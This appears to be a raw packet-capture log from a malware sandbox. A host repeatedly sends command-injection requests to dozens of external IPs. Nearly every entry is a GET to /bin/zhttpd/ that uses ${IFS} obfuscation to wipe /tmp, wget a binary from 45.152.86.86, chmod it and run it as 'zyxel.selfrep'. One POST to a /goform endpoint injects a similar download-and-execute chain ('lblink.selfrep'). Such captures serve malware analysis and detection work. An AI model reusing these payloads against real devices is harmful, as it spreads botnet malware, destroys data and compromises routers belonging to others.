                                        Mar 31, 2024 09:22:09.509752989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7227192.168.2.2353456166.186.98.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509789944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7228192.168.2.2354464185.169.235.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509857893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7229192.168.2.2342954203.115.135.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509890079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7230192.168.2.2351706188.140.199.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509924889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7231192.168.2.234894244.204.88.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509955883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7232192.168.2.2349626178.240.144.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510008097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7233192.168.2.2354242152.94.170.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510037899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7234192.168.2.233742414.71.143.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510086060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7235192.168.2.235318813.194.118.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510138988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7236192.168.2.235137074.93.35.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510195971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7237192.168.2.23510741.252.214.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510234118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7238192.168.2.2336052218.254.150.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510287046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7239192.168.2.2348148156.71.95.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510351896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7240192.168.2.233491459.182.11.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510406017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7241192.168.2.2346360169.181.128.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510433912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7242192.168.2.2339386135.37.215.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510484934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7243192.168.2.2357050110.192.51.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510515928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7244192.168.2.2359860190.159.232.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510559082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7245192.168.2.2351466113.131.157.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510581017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7246192.168.2.233632476.56.84.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510616064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7247192.168.2.2341220161.12.179.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510668039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7248192.168.2.2352752126.56.53.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510724068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7249192.168.2.2338854170.207.250.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510768890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7250192.168.2.2353564106.255.78.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510802984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7251192.168.2.2352566119.188.175.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.510860920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7252192.168.2.235163464.180.62.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.517393112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7253192.168.2.235054627.154.65.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.517420053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7254192.168.2.2354212158.59.19.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:10.507694960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7255192.168.2.2335268161.13.44.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:10.507726908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7256192.168.2.233980065.180.187.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:10.507756948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7257192.168.2.2340456182.104.105.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:10.507800102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7258192.168.2.2348704183.248.205.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:10.507862091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7259192.168.2.2338364203.77.232.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:10.507899046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7260192.168.2.233609489.106.63.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:10.507926941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7261192.168.2.2347574119.189.81.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:10.507971048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7262192.168.2.2353292174.198.232.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:10.508002996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7263192.168.2.2351780172.206.107.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:10.508049965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7264192.168.2.233973488.148.133.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:10.508105993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7265192.168.2.235023641.134.119.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:10.508141994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7266192.168.2.234141489.103.230.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:11.515542984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7267192.168.2.2355794138.36.138.2478080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:12.367197990 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:12.468265057 CEST1260INHTTP/1.1 400 Bad Request
                                        Server: squid/6.0.0-20220501-re899e0c27
                                        Mime-Version: 1.0
                                        Date: Sun, 31 Mar 2024 07:22:12 GMT
                                        Content-Type: text/html;charset=utf-8
                                        Content-Length: 3587
                                        X-Squid-Error: ERR_INVALID_URL 0
                                        Vary: Accept-Language
                                        Content-Language: en
                                        Cache-Status: ezproxies.com
                                        Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7268192.168.2.2347540190.168.130.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:12.519068003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7269192.168.2.234436888.136.203.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:12.519112110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7270192.168.2.235429475.104.111.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:12.519259930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7271192.168.2.235081250.210.45.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:12.519300938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7272192.168.2.2341138124.223.58.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:13.522583961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7273192.168.2.2343152148.239.180.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:13.522684097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7274192.168.2.233497423.183.177.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:13.522708893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7275192.168.2.235431691.20.221.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534111023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7276192.168.2.2351096102.126.109.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534147978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7277192.168.2.234278691.154.58.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534178972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7278192.168.2.235910688.10.194.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534245014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7279192.168.2.2344892104.58.129.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534296989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7280192.168.2.235713043.48.151.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534342051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7281192.168.2.233805286.28.25.23443
                                        TimestampBytes transferredDirectionData
